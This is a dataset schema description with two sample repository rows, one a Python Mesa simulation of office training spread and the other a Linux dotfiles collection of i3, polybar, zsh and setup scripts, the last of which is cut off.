Dataset schema (column, type, observed range):

    repo_name            string          length 5–114
    repo_url             string          length 24–133
    snapshot_id          string          length 40
    revision_id          string          length 40
    directory_id         string          length 40
    branch_name          string          209 classes
    visit_date           timestamp[ns]
    revision_date        timestamp[ns]
    committer_date       timestamp[ns]
    github_id            int64           9.83k–683M
    star_events_count    int64           0–22.6k
    fork_events_count    int64           0–4.15k
    gha_license_id       string          17 classes
    gha_created_at       timestamp[ns]
    gha_updated_at       timestamp[ns]
    gha_pushed_at        timestamp[ns]
    gha_language         string          115 classes
    files                list            1–13.2k items
    num_files            int64           1–13.2k
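The schema lists one row per repository snapshot; the ranges are statistics observed over the data, not constraints. As a minimal sketch of consuming rows of this shape, assuming the data is published as a Hugging Face dataset (the identifier "org/dataset-name" and the "train" split below are placeholders, not the real names):

```python
# Minimal sketch: stream and inspect rows with the schema above.
# "org/dataset-name" and the split name are placeholder assumptions.
from datasets import load_dataset

ds = load_dataset("org/dataset-name", split="train", streaming=True)

for row in ds:
    # Scalar metadata fields, as in the schema table.
    print(row["repo_name"], row["gha_language"], row["num_files"])
    # `files` is a list of per-file records: path, language, text, etc.
    first = row["files"][0]
    print(first["path"], first["language"], len(first["text"]))
    break  # look at just the first row
```

Streaming avoids downloading the full dataset when only a few rows are needed.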
Sample rows:

repo_name: patsess/agent-based-models-practice
repo_url: https://github.com/patsess/agent-based-models-practice
snapshot_id: a5c6f31ab4247fa2eeee925dbc41abd1ebe59e04
revision_id: ce0c07df2ce5bb1dc058780059bb01bd4f303e60
directory_id: e0eb502f6e44c2dcba68a59b79008c7269ef421f
branch_name: refs/heads/master
visit_date: 2022-12-13T09:53:31.844548
revision_date: 2020-02-05T11:43:28
committer_date: 2020-02-05T11:43:28
github_id: 238211957
star_events_count: 0
fork_events_count: 0
gha_license_id: null
gha_created_at: 2020-02-04T13:24:53
gha_updated_at: 2020-02-05T11:43:52
gha_pushed_at: 2022-12-08T03:33:19
gha_language: Python
files:
[ { "alpha_fraction": 0.595329225063324, "alphanum_fraction": 0.6026033759117126, "avg_line_length": 31.234567642211914, "blob_id": "7a731d55c7c64ad70edb0987875827bab6df6a57", "content_id": "4292eaee1e33edd3d9fb6efcd1da1719df88b94d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2612, "license_type": "no_license", "max_line_length": 76, "num_lines": 81, "path": "/agentbasedmodelspractice/office_training/model.py", "repo_name": "patsess/agent-based-models-practice", "src_encoding": "UTF-8", "text": "\nimport logging\nimport random\nfrom mesa import Model\nfrom mesa.time import RandomActivation\nfrom mesa.space import SingleGrid\nfrom mesa.datacollection import DataCollector\nfrom agentbasedmodelspractice.office_training.trainer import Trainer\nfrom agentbasedmodelspractice.office_training.office_worker_agent import (\n OfficeWorker)\n\n__author__ = 'psessford'\n\nlogging.basicConfig(level=logging.INFO)\n\n# TODO: docstrs\n# TODO: more logging\n\n# TODO: RANDOMISE LOOP THROUGH WORKERS FROM THE TRAINER!!!\n\n\nclass TrainingCoverage(Model):\n def __init__(self, height=20, width=20, density=0.65, n_steps=100):\n super().__init__()\n self.height = height\n self.width = width\n self.density = density\n self.n_steps = n_steps\n\n self.logger = logging.getLogger(__name__)\n\n self.schedule = RandomActivation(self)\n self.grid = SingleGrid(width, height, torus=False)\n\n self.is_trained = 0\n self.datacollector = DataCollector({'is_trained': 'is_trained'})\n\n self.trainer = Trainer()\n\n self._set_up_agents()\n\n self.running = True\n self.datacollector.collect(self)\n\n def step(self):\n self.is_trained = 0 # reset counter of trained agents\n self.schedule.step()\n self.datacollector.collect(self) # update tracker of trained agents\n\n self._update_worker_training()\n\n if self.n_steps < self.schedule.steps:\n self.running = False # run for specified number of steps\n\n def _set_up_agents(self):\n for cell in self.grid.coord_iter():\n x = cell[1] # grid coordinate\n y = cell[2]\n if self.random.random() < self.density:\n time_at_desk = random.random()\n agent = OfficeWorker(\n pos=(x, y), model=self, time_at_desk=time_at_desk)\n self.grid.position_agent(agent, (x, y))\n self.schedule.add(agent)\n\n def _update_worker_training(self):\n n_workers_trained = 0\n for cell in self.grid.coord_iter():\n if self.trainer.capacity <= n_workers_trained:\n break # no more trainer capacity for this step\n\n agent = cell[0]\n if agent is None:\n continue\n\n train_decision = self.trainer.get_train_decision(\n worker_agent=agent)\n if train_decision:\n self.logger.info(f\"trainer is training office worker at \"\n f\"location ({cell[1]}, {cell[2]})\")\n agent.is_trained = True\n n_workers_trained += 1\n" }, { "alpha_fraction": 0.8275862336158752, "alphanum_fraction": 0.8275862336158752, "avg_line_length": 29, "blob_id": "941ca7df3150c185983fc284a48d9d5ecf511026", "content_id": "57c8826ebe5948b6549c5bf5802b843bec294a7d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 29, "license_type": "no_license", "max_line_length": 29, "num_lines": 1, "path": "/README.md", "repo_name": "patsess/agent-based-models-practice", "src_encoding": "UTF-8", "text": "# agent-based-models-practice" }, { "alpha_fraction": 0.6776119470596313, "alphanum_fraction": 0.6776119470596313, "avg_line_length": 29.363636016845703, "blob_id": "0f54be07cb60d0f7baf9051c1c1b264385e99b00", "content_id": 
"821df04dba96b3f373ff8c2185f4ef43bddc5291", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 335, "license_type": "no_license", "max_line_length": 74, "num_lines": 11, "path": "/agentbasedmodelspractice/office_training/run.py", "repo_name": "patsess/agent-based-models-practice", "src_encoding": "UTF-8", "text": "\n# import sys\n# from pathlib import Path\n# module_path = str(Path(__file__).absolute().parent.parent.parent)\n# if module_path not in sys.path:\n# sys.path.append(module_path) # e.g. '.../repos/<name_of_this_repo>'\n\nfrom agentbasedmodelspractice.office_training.server import server\n\n\nif __name__ == '__main__':\n server.launch()\n" }, { "alpha_fraction": 0.5726218223571777, "alphanum_fraction": 0.5758700966835022, "avg_line_length": 29.338027954101562, "blob_id": "d09f9b13614f44fa183382fe99e255d22e262812", "content_id": "129a6159cee1e9dc06cc7bc1982ae26567dbc178", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2155, "license_type": "no_license", "max_line_length": 80, "num_lines": 71, "path": "/agentbasedmodelspractice/office_training/office_worker_agent.py", "repo_name": "patsess/agent-based-models-practice", "src_encoding": "UTF-8", "text": "\nimport logging\nimport random\nfrom mesa import Agent\n\n__author__ = 'psessford'\n\nlogging.basicConfig(level=logging.INFO)\n\n# TODO: docstrs\n\n\nclass OfficeWorker(Agent):\n def __init__(self, pos, model, time_at_desk):\n super().__init__(pos, model)\n self.pos = pos\n self.time_at_desk = time_at_desk\n\n self.logger = logging.getLogger(__name__)\n\n # initialise useful attributes\n self.is_trained = False\n self.neighbour_training = 0\n\n # initialise helpers for properties\n self._collaboration = None\n\n @property\n def max_n_neighbours(self):\n return 8\n\n @property\n def neighbour_training_scalar(self):\n return 0.1\n\n @property\n def collaboration(self):\n if self._collaboration is None:\n self._collaboration = self._get_worker_collaboration()\n\n return self._collaboration\n\n def step(self):\n self._set_neighbour_training()\n self._update_is_trained_by_neighbour()\n\n def _get_worker_collaboration(self):\n return sum(self.model.grid.neighbor_iter(self.pos))\n\n def _set_neighbour_training(self):\n self.neighbour_training = (\n sum(neighbour.is_trained\n for neighbour in self.model.grid.neighbor_iter(self.pos)) /\n float(self.max_n_neighbours))\n\n def _update_is_trained_by_neighbour(self):\n if not self.is_trained:\n for neighbour in self.model.grid.neighbor_iter(self.pos):\n if not neighbour.is_trained:\n continue\n\n r = (random.random() * self.time_at_desk *\n self.neighbour_training_scalar)\n # self.logger.info(\n # f\"random value to determine training from neighbour: {r}\")\n is_training_received = ((1. 
- neighbour.time_at_desk) < r)\n if is_training_received:\n self.logger.info(\n f\"neighbour training rubbed off on office worker at \"\n f\"location ({neighbour.pos[0]}, {neighbour.pos[1]})\")\n self.is_trained = True\n break\n" }, { "alpha_fraction": 0.6135675311088562, "alphanum_fraction": 0.6480920910835266, "avg_line_length": 29, "blob_id": "375217535b2de7442cdeb07cad03d644ac5d4cc7", "content_id": "0fcf0f2ebce8b3077012c64d109bf1785d3a07a3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1651, "license_type": "no_license", "max_line_length": 76, "num_lines": 55, "path": "/agentbasedmodelspractice/office_training/server.py", "repo_name": "patsess/agent-based-models-practice", "src_encoding": "UTF-8", "text": "\nfrom mesa.visualization.ModularVisualization import ModularServer\nfrom mesa.visualization.modules import CanvasGrid, ChartModule, TextElement\nfrom mesa.visualization.UserParam import UserSettableParameter\nfrom agentbasedmodelspractice.office_training.model import TrainingCoverage\n\n\nclass TrainingCoverageElement(TextElement):\n '''\n Display a text count of how many happy agents there are.\n '''\n\n def __init__(self):\n super().__init__()\n\n def render(self, model):\n return \"Number of staff trained agents: \" + str(model.is_trained)\n\n\ndef draw_training_coverage(agent):\n '''\n Portrayal Method for canvas\n '''\n if agent is None:\n return None\n\n portrayal = {\"Shape\": \"circle\", \"r\": 0.5, \"Filled\": \"true\", \"Layer\": 0}\n\n if agent.is_trained == 0:\n portrayal[\"Color\"] = [\"#FF0000\", \"#FF9999\"]\n portrayal[\"stroke_color\"] = \"#00FF00\"\n else:\n portrayal[\"Color\"] = [\"#0000FF\", \"#9999FF\"]\n portrayal[\"stroke_color\"] = \"#000000\"\n\n return portrayal\n\n\ntraining_element = TrainingCoverageElement()\ncanvas_element = CanvasGrid(\n draw_training_coverage, grid_width=20, grid_height=20, canvas_width=500,\n canvas_height=500)\ntraining_chart = ChartModule([{\"Label\": \"is_trained\", \"Color\": \"Black\"}])\n\nmodel_params = {\n \"height\": 20,\n \"width\": 20,\n \"density\": UserSettableParameter(\n \"slider\", \"Agent density\", value=0.65, min_value=0.1, max_value=1.0,\n step=0.05),\n \"n_steps\": 100,\n}\n\nserver = ModularServer(TrainingCoverage,\n [canvas_element, training_element, training_chart],\n \"Schelling\", model_params)\n" }, { "alpha_fraction": 0.4585987329483032, "alphanum_fraction": 0.6857749223709106, "avg_line_length": 14.699999809265137, "blob_id": "293fac360433558bbda0514f9d8100e66efed34c", "content_id": "bda1813eb95b1796d46944ab25bb44efda84d4f9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 471, "license_type": "no_license", "max_line_length": 22, "num_lines": 30, "path": "/requirements.txt", "repo_name": "patsess/agent-based-models-practice", "src_encoding": "UTF-8", "text": "arrow==0.15.5\nbinaryornot==0.4.4\ncertifi==2019.11.28\nchardet==3.0.4\nClick==7.0\ncookiecutter==1.7.0\ncycler==0.10.0\ndecorator==4.4.1\nfuture==0.18.2\ngunicorn==20.0.4\nidna==2.8\nJinja2==2.11.1\njinja2-time==0.2.0\nkiwisolver==1.1.0\nMarkupSafe==1.1.1\nmatplotlib==3.1.3\nMesa==0.8.6\nnetworkx==2.4\nnumpy==1.18.1\npandas==1.0.0\npoyo==0.5.0\npyparsing==2.4.6\npython-dateutil==2.8.1\npytz==2019.3\nrequests==2.22.0\nsix==1.14.0\ntornado==6.0.3\ntqdm==4.42.1\nurllib3==1.25.8\nwhichcraft==0.6.1\n" }, { "alpha_fraction": 0.6883116960525513, "alphanum_fraction": 0.6883116960525513, "avg_line_length": 26.909090042114258, "blob_id": 
"f0067574ae742b989c9157b6f87887938c604048", "content_id": "c3b3e668a1804fca94dd59b064fed91a3fa46b3c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 308, "license_type": "no_license", "max_line_length": 72, "num_lines": 11, "path": "/app.py", "repo_name": "patsess/agent-based-models-practice", "src_encoding": "UTF-8", "text": "\nimport sys\nfrom pathlib import Path\nmodule_path = str(Path(__file__).absolute().parent)\nif module_path not in sys.path:\n sys.path.append(module_path) # e.g. '.../repos/<name_of_this_repo>'\n\nfrom agentbasedmodelspractice.office_training.run import server\n\n\nif __name__ == '__main__':\n server.launch()\n" }, { "alpha_fraction": 0.6150943636894226, "alphanum_fraction": 0.6251572370529175, "avg_line_length": 28.407407760620117, "blob_id": "a7a1389e707f2d0731e3eefdb78d7814771edb68", "content_id": "569643e033a1ce1c6048816fd3b34dd3202b382d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 795, "license_type": "no_license", "max_line_length": 75, "num_lines": 27, "path": "/agentbasedmodelspractice/office_training/trainer.py", "repo_name": "patsess/agent-based-models-practice", "src_encoding": "UTF-8", "text": "\nimport random\n\n__author__ = 'psessford'\n\n# TODO: docstrs\n# TODO: logging\n\n\nclass Trainer(object):\n def __init__(self, capacity=2, team_importance=0.5):\n self.capacity = capacity\n self.team_importance = team_importance\n self.individual_importance = 1. - self.team_importance\n\n def get_train_decision(self, worker_agent):\n assert (0. <= worker_agent.neighbour_training <= 1.)\n assert (0. <= worker_agent.time_at_desk <= 1.)\n\n worker_importance = (\n self.individual_importance * worker_agent.time_at_desk)\n team_importance = (\n self.team_importance * worker_agent.neighbour_training)\n\n r = random.random()\n train_decision = ((r < worker_importance) or (r < team_importance))\n\n return train_decision\n" } ]
num_files: 8
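Each row's `files` list carries full file contents alongside per-file metadata, so a snapshot can be written back to disk. A minimal sketch, assuming `row` is one decoded record like the one above; `materialize` and its output directory are illustrative names, not part of the dataset:

```python
import os

def materialize(row, out_dir="snapshot"):
    """Write each file record's `text` to its repo-relative `path`."""
    for f in row["files"]:
        # Paths in these records are repo-rooted ("/README.md"), so strip
        # the leading slash before joining with the output directory.
        dest = os.path.join(out_dir, f["path"].lstrip("/"))
        os.makedirs(os.path.dirname(dest), exist_ok=True)
        with open(dest, "w", encoding=f.get("src_encoding", "UTF-8")) as fh:
            fh.write(f["text"])
```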
repo_name: johnnylord/dotfile
repo_url: https://github.com/johnnylord/dotfile
snapshot_id: 2e87314ac881f05c6d928e2f21cd5c90481f0bd8
revision_id: 456f1b78e7afee85b13c0b18df25a125a6a08030
directory_id: 6a947f28b4e072d4bc1ae4a79059692fcbf156f9
branch_name: refs/heads/master
visit_date: 2023-06-15T05:30:56.959185
revision_date: 2023-06-03T06:31:17
committer_date: 2023-06-03T06:31:17
github_id: 173019376
star_events_count: 3
fork_events_count: 1
gha_license_id: null
gha_created_at: null
gha_updated_at: null
gha_pushed_at: null
gha_language: null
files:
[ { "alpha_fraction": 0.6333333253860474, "alphanum_fraction": 0.6499999761581421, "avg_line_length": 29, "blob_id": "9f498ed53fed6866556b4bfd944aaa036ee8672a", "content_id": "328f6176ac494ba32b85204a5901c8882fc41667", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 60, "license_type": "permissive", "max_line_length": 49, "num_lines": 2, "path": "/i3blocks/weather/weather_info.sh", "repo_name": "johnnylord/dotfile", "src_encoding": "UTF-8", "text": "#!/bin/sh\necho \" $(~/.config/i3blocks/weather/weather.py) \"\n" }, { "alpha_fraction": 0.4247104227542877, "alphanum_fraction": 0.48262548446655273, "avg_line_length": 63.75, "blob_id": "e0ec78c60287cb6ed20d94439328fc75ec98a52b", "content_id": "10c77391a4202882d33939577d52923e1a2c7ba1", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 261, "license_type": "permissive", "max_line_length": 107, "num_lines": 4, "path": "/i3blocks/cpu/cpu_info.sh", "repo_name": "johnnylord/dotfile", "src_encoding": "UTF-8", "text": "#!/bin/sh\nTEMP=$(sensors | grep 'Package id 0:\\|Tdie' | grep ':[ ]*+[0-9]*.[0-9]*°C' -o | grep '+[0-9]*.[0-9]*°C' -o)\nCPU_USAGE=$(mpstat 1 1 | awk '/Average:/ {printf(\"%s\\n\", $(NF-9))}')\necho \"$CPU_USAGE $TEMP\" | awk '{ printf(\" CPU:%6s% @ %s \\n\"), $1, $2 }'\n" }, { "alpha_fraction": 0.5798816680908203, "alphanum_fraction": 0.5917159914970398, "avg_line_length": 28.39130401611328, "blob_id": "5aa416de1b05dee0b2418c38b1706ffd5c799d76", "content_id": "f9a9458fcc150dcfd41bf9761bd3a3325e85408a", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 676, "license_type": "permissive", "max_line_length": 130, "num_lines": 23, "path": "/i3wm/bin/logout", "repo_name": "johnnylord/dotfile", "src_encoding": "UTF-8", "text": "#!/usr/bin/env bash\n# Manage logout with rofi\noption=`echo -e \"suspend\\nlock screen\\nlogout\\nreboot\\npoweroff\\nKill user $USER\" | rofi -width 600 -dmenu -p system:`\ncase $option in\n suspend)\n sudo /usr/bin/systemctl syspend\n ;;\n 'lock screen')\n i3lock -i /home/koromicha/Pictures/linuxtux.png\n ;;\n logout)\n i3-nagbar -t warning -m 'Are you sure you want to exit i3? This will end your X session.' 
-b 'Yes, exit i3' 'i3-msg exit'\n ;;\n reboot)\n /usr/bin/systemctl reboot\n ;;\n poweroff)\n /usr/bin/systemctl poweroff\n ;;\n 'kill user $USER')\n loginctl kill-user $USER\n ;;\nesac\n" }, { "alpha_fraction": 0.5581395626068115, "alphanum_fraction": 0.5930232405662537, "avg_line_length": 42, "blob_id": "435469322d093bac9bfed7d445756e5011de1773", "content_id": "4f3ef3c00535cd855fc60f421123abcc2fb4db01", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 86, "license_type": "permissive", "max_line_length": 73, "num_lines": 2, "path": "/i3wm/bin/rofifinder", "repo_name": "johnnylord/dotfile", "src_encoding": "UTF-8", "text": "#!/bin/bash\nxdg-open \"$(locate -i / | rofi -threads 0 -width 60 -dmenu -i -p \"Find\")\"\n" }, { "alpha_fraction": 0.7382199168205261, "alphanum_fraction": 0.7434554696083069, "avg_line_length": 20.22222137451172, "blob_id": "afa0f5db1d9f1c78d8ca66ee12fa317943dff005", "content_id": "11f82654d70a9732f3a45bc38ca99277440a3104", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 191, "license_type": "permissive", "max_line_length": 40, "num_lines": 9, "path": "/zsh/exports.zsh", "repo_name": "johnnylord/dotfile", "src_encoding": "UTF-8", "text": "export EDITOR=\"nvim\"\n\n# Pyenv\nexport PYENV_ROOT=\"$HOME/.pyenv\"\nexport PATH=\"$PYENV_ROOT/bin:$PATH\"\nexport PYENV_VIRTUALENV_DISABLE_PROMPT=1\n\n# Include snap path\nexport PATH=\"/snap/bin:$PATH\"\n" }, { "alpha_fraction": 0.6891891956329346, "alphanum_fraction": 0.6891891956329346, "avg_line_length": 36, "blob_id": "3a0ac421623975b4b79bfdd484332eb266634ab1", "content_id": "d3cef712df17a4361c4e1ccffc2080b20c1a3e63", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 74, "license_type": "permissive", "max_line_length": 56, "num_lines": 2, "path": "/zsh/aliases.zsh", "repo_name": "johnnylord/dotfile", "src_encoding": "UTF-8", "text": "alias vim=\"nvim\"\nalias graph=\"git log --all --decorate --oneline --graph\"\n" }, { "alpha_fraction": 0.6743687391281128, "alphanum_fraction": 0.7004526257514954, "avg_line_length": 23.9139461517334, "blob_id": "0ff47d5dcb26c3925bb6fd69746b29bc22c9fb4c", "content_id": "e2bf9dbe281cfb7075456c3970c5ddd6dc934e99", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "INI", "length_bytes": 9025, "license_type": "permissive", "max_line_length": 91, "num_lines": 337, "path": "/.config/polybar/config", "repo_name": "johnnylord/dotfile", "src_encoding": "UTF-8", "text": ";==========================================================\n;\n;\n; ██████╗ ██████╗ ██╗ ██╗ ██╗██████╗ █████╗ ██████╗\n; ██╔══██╗██╔═══██╗██║ ╚██╗ ██╔╝██╔══██╗██╔══██╗██╔══██╗\n; ██████╔╝██║ ██║██║ ╚████╔╝ ██████╔╝███████║██████╔╝\n; ██╔═══╝ ██║ ██║██║ ╚██╔╝ ██╔══██╗██╔══██║██╔══██╗\n; ██║ ╚██████╔╝███████╗██║ ██████╔╝██║ ██║██║ ██║\n; ╚═╝ ╚═════╝ ╚══════╝╚═╝ ╚═════╝ ╚═╝ ╚═╝╚═╝ ╚═╝\n;\n;\n; To learn more about how to configure Polybar\n; go to https://github.com/jaagr/polybar\n;\n; The RADME contains alot of cyanrmation\n;\n;==========================================================\n\n[colors]\nbackground = ${xrdb:background}\nbackground-alt = ${xrdb:color8}\nforeground = ${xrdb:foreground}\nforeground-alt = ${xrdb:color15}\n\ncyan = ${xrdb:color6}\ngreen = ${xrdb:color2}\nyellow = ${xrdb:color3}\nred = ${xrdb:color1}\n\n[bar/mybar]\nwidth = 100%\nheight = 30\nradius-top = 5\nfixed-center = false\n\nbackground = 
${colors.background}\nforeground = ${colors.foreground}\n\nline-size = 3\nline-color = ${colors.background-alt}\n\npadding-left = 0\npadding-right = 2\n\nmodule-margin-left = 0\nmodule-margin-right = 2\n\nfont-0 = DejaVu Sans Mono:style=Bold:size=12;2\nfont-1 = Font Awesome 5 Free,Font Awesome 5 Free Solid:style=Solid:size=12;2\nfont-2 = Font Awesome 5 Brands,Font Awesome 5 Brands Regular:style=Regular:size=12;2\n\nmodules-left = i3\nmodules-center =\nmodules-right = backlight-acpi pulseaudio wlan eth1 eth2 battery0 battery1 temperature date\n\nlocale = en_US.UTF-8\n\ncursor-click = pointer\ncursor-scroll = ns-resize\n\n[module/i3]\ntype = internal/i3\nformat = <label-state> <label-mode>\nindex-sort = true\nwrapping-scroll = false\n\nws-icon-0 = 1;\nws-icon-1 = 2;\nws-icon-2 = 3;\nws-icon-3 = 4;\nws-icon-4 = 5;\nws-icon-5 = 6;\n\n; Only show workspaces on the same output as the bar\n;pin-workspaces = true\n\nlabel-mode-padding = 2\nlabel-mode-foreground = ${colors.foreground}\nlabel-mode-background = ${colors.background}\n\n; focused = Active workspace on focused monitor\nlabel-focused = %icon%\nlabel-focused-background = ${colors.background}\nlabel-focused-underline = ${colors.green}\nlabel-focused-padding = 2\n\n; unfocused = Inactive workspace on any monitor\nlabel-unfocused = %icon% %index%\nlabel-unfocused-underline = ${colors.background-alt}\nlabel-unfocused-padding = 2\n\n; visible = Active workspace on unfocused monitor\nlabel-visible = %icon% %index%\nlabel-visible-background = ${colors.background}\nlabel-visible-underline = ${colors.yellow}\nlabel-visible-padding = 2\n\n; urgent = Workspace with urgency hint set\nlabel-urgent = %icon% %index%\nlabel-urgent-background = ${colors.red}\nlabel-urgent-padding = 2\n\n; Separator in between workspaces\n; label-separator = |\n\n[module/xbacklight]\ntype = internal/xbacklight\n\nformat = <label> <bar>\nlabel = BL\n\nbar-width = 10\nbar-indicator = |\nbar-indicator-foreground = #fff\nbar-indicator-font = 2\nbar-fill = ─\nbar-fill-font = 2\nbar-fill-foreground = #9f78e1\nbar-empty = ─\nbar-empty-font = 2\nbar-empty-foreground = ${colors.foreground-alt}\n\n[module/backlight-acpi]\ninherit = module/xbacklight\ntype = internal/backlight\ncard = intel_backlight\n\n[module/wlan]\ntype = internal/network\ninterface = wlp3s0\ninterval = 3.0\n\nformat-connected-prefix = \" \"\nformat-connected-prefix-foreground = ${colors.green}\nformat-connected-underline = ${colors.green}\nlabel-connected = %local_ip%\n\nformat-disconnected =\n;format-disconnected = <label-disconnected>\n;format-disconnected-underline = ${self.format-connected-underline}\n;label-disconnected = %ifname% disconnected\n;label-disconnected-foreground = ${colors.foreground-alt}\n\n[module/eth1]\ntype = internal/network\ninterface = enp0s31f6\ninterval = 3.0\n\nformat-connected-prefix = \" \"\nformat-connected-prefix-foreground = ${colors.green}\nformat-connected-underline = ${colors.green}\nlabel-connected = %local_ip%\n\nformat-disconnected =\n;format-disconnected = <label-disconnected>\n;format-disconnected-underline = ${self.format-connected-underline}\n;label-disconnected = %ifname% disconnected\n;label-disconnected-foreground = ${colors.foreground-alt}\n\n[module/eth2]\ntype = internal/network\ninterface = enp0s20f0u4u1u2\ninterval = 3.0\n\nformat-connected-prefix = \" \"\nformat-connected-prefix-foreground = ${colors.green}\nformat-connected-underline = ${colors.green}\nlabel-connected = %local_ip%\n\nformat-disconnected =\n;format-disconnected = 
<label-disconnected>\n;format-disconnected-underline = ${self.format-connected-underline}\n;label-disconnected = %ifname% disconnected\n;label-disconnected-foreground = ${colors.foreground-alt}\n\n[module/date]\ntype = internal/date\ninterval = 5\n\ndate =\ndate-alt = \" %Y-%m-%d\"\n\ntime = %H:%M\ntime-alt = %H:%M:%S\n\nformat-prefix = \nformat-prefix-foreground = ${colors.foreground}\nformat-underline = ${colors.foreground}\n\nlabel = %date% %time%\n\n[module/pulseaudio]\ntype = internal/pulseaudio\n\nformat-volume = <label-volume> <bar-volume>\nlabel-volume = VOL\nlabel-volume-foreground = ${root.foreground}\n\nlabel-muted = 🔇 muted\nlabel-muted-foreground = #666\n\nbar-volume-width = 10\nbar-volume-foreground-0 = #55aa55\nbar-volume-foreground-1 = #55aa55\nbar-volume-foreground-2 = #55aa55\nbar-volume-foreground-3 = #55aa55\nbar-volume-foreground-4 = #55aa55\nbar-volume-foreground-5 = #f5a70a\nbar-volume-foreground-6 = #ff5555\nbar-volume-gradient = false\nbar-volume-indicator = |\nbar-volume-indicator-font = 2\nbar-volume-fill = ─\nbar-volume-fill-font = 2\nbar-volume-empty = ─\nbar-volume-empty-font = 2\nbar-volume-empty-foreground = ${colors.foreground-alt}\n\n[module/alsa]\ntype = internal/alsa\n\nformat-volume = <label-volume> <bar-volume>\nlabel-volume = VOL\nlabel-volume-foreground = ${root.foreground}\n\nformat-muted-prefix = \" \"\nformat-muted-foreground = ${colors.foreground-alt}\nlabel-muted = sound muted\n\nbar-volume-width = 10\nbar-volume-foreground-0 = #55aa55\nbar-volume-foreground-1 = #55aa55\nbar-volume-foreground-2 = #55aa55\nbar-volume-foreground-3 = #55aa55\nbar-volume-foreground-4 = #55aa55\nbar-volume-foreground-5 = #f5a70a\nbar-volume-foreground-6 = #ff5555\nbar-volume-gradient = false\nbar-volume-indicator = |\nbar-volume-indicator-font = 2\nbar-volume-fill = ─\nbar-volume-fill-font = 2\nbar-volume-empty = ─\nbar-volume-empty-font = 2\nbar-volume-empty-foreground = ${colors.foreground-alt}\n\n[module/battery0]\ntype = internal/battery\nbattery = BAT0\nadapter = AC\nfull-at = 98\n\nformat-charging = <animation-charging> <label-charging>\nformat-charging-underline = ${colors.yellow}\n\nformat-discharging = <animation-discharging> <label-discharging>\nformat-discharging-underline = ${colors.red}\n\nformat-full-prefix = \" \"\nformat-full-prefix-foreground = ${colors.green}\nformat-full-underline = ${colors.green}\n\nanimation-charging-0 = \nanimation-charging-1 = \nanimation-charging-2 = \nanimation-charging-3 = \nanimation-charging-4 = \nanimation-charging-foreground = ${colors.yellow}\nanimation-charging-framerate = 750\n\nanimation-discharging-0 = \nanimation-discharging-1 = \nanimation-discharging-2 = \nanimation-discharging-3 = \nanimation-discharging-4 = \nanimation-discharging-foreground = ${colors.red}\nanimation-discharging-framerate = 750\n\n[module/battery1]\ntype = internal/battery\nbattery = BAT1\nadapter = AC\nfull-at = 98\n\nformat-charging = <animation-charging> <label-charging>\nformat-charging-underline = ${colors.yellow}\n\nformat-discharging = <animation-discharging> <label-discharging>\nformat-discharging-underline = ${colors.red}\n\nformat-full-prefix = \" \"\nformat-full-prefix-foreground = ${colors.green}\nformat-full-underline = ${colors.green}\n\nanimation-charging-0 = \nanimation-charging-1 = \nanimation-charging-2 = \nanimation-charging-3 = \nanimation-charging-4 = \nanimation-charging-foreground = ${colors.yellow}\nanimation-charging-framerate = 750\n\nanimation-discharging-0 = \nanimation-discharging-1 = 
\nanimation-discharging-2 = \nanimation-discharging-3 = \nanimation-discharging-4 = \nanimation-discharging-foreground = ${colors.red}\nanimation-discharging-framerate = 750\n\n[module/temperature]\ntype = internal/temperature\nthermal-zone = 0\nwarn-temperature = 70\n\nformat = <ramp> <label>\nformat-underline = ${colors.yellow}\nformat-warn = <ramp> <label-warn>\nformat-warn-underline = ${colors.red}\n\nlabel = %temperature-c%\nlabel-warn = %temperature-c%\nlabel-warn-foreground = ${colors.red}\n\nramp-0 = \nramp-1 = \nramp-2 = \nramp-foreground = ${colors.yellow}\n\n[settings]\nscreenchange-reload = true\n\n[global/wm]\nmargin-top = 5\nmargin-bottom = 5\n\n; vim:ft=dosini\n" }, { "alpha_fraction": 0.5849056839942932, "alphanum_fraction": 0.5849056839942932, "avg_line_length": 12.25, "blob_id": "df93cb852f4de4f04603a66cc1a6cb179ac24ab3", "content_id": "e0bed4e2a8b8e58e188bc06d6b918ea6965f8750", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 53, "license_type": "permissive", "max_line_length": 26, "num_lines": 4, "path": "/README.md", "repo_name": "johnnylord/dotfile", "src_encoding": "UTF-8", "text": "## How to run\n```bash\nsudo ./setup.sh [username]\n```\n" }, { "alpha_fraction": 0.6646544337272644, "alphanum_fraction": 0.6700665950775146, "avg_line_length": 29.598726272583008, "blob_id": "19a813fb743632e585caf0bcb147979d4e9eef17", "content_id": "56bf0bfe9ad7c44abb6867450b375459c2399648", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 4804, "license_type": "permissive", "max_line_length": 83, "num_lines": 157, "path": "/setup.sh", "repo_name": "johnnylord/dotfile", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nif [ $USER != \"root\" ]; then\n echo \"Please execute setup.sh with sudo permission\"\n exit 1\nfi\n\nif [ $# -ne 1 ]; then\n echo \"Please enter [username] after setup.sh\"\n exit 1\nfi\n\n# Check user is valid or not\nUSERNAME=$1\ngrep -Fq \"/home/${USERNAME}:\" /etc/passwd\nif [ $? 
